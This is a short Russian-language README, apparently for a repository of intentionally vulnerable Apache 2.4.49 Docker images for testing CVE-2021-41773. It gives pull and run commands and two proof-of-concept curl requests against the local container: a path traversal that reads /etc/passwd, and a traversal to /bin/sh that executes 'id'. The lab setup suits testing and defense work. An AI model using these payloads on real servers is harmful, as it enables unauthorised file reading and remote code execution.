
Уязвимые образы Docker для CVE-2021-41773
Эта уязвимость только применяется к версии 2.4.49, которая имеет определенные нестандартные конфигурации. В определенных ситуациях это может привести к чтению файлов или выполнению кода.
https://twitter.com/ptswarm/status/1445376079548624899
Контейнеры можно получить напрямую из Docker Hub с помощью
docker pull blueteamsteve/cve-2021-41773:no-cgid
и запустить с помощью
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Журналы Apache можно просмотреть с помощью команды ниже, или просто исключить флаг "-dit" из указанной выше команды запуска для потоковой передачи stdio
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Контейнеры можно получить напрямую из Docker Hub с помощью
docker pull blueteamsteve/cve-2021-41773:with-cgid
и запустить с помощью
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Журналы Apache можно просмотреть с помощью команды ниже, или просто исключить флаг "-dit" из указанной выше команды запуска для потоковой передачи stdio
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
Изменяйте и создавайте свои версии, используя dockerfile и шаблонные файлы httpd.conf в подкаталогах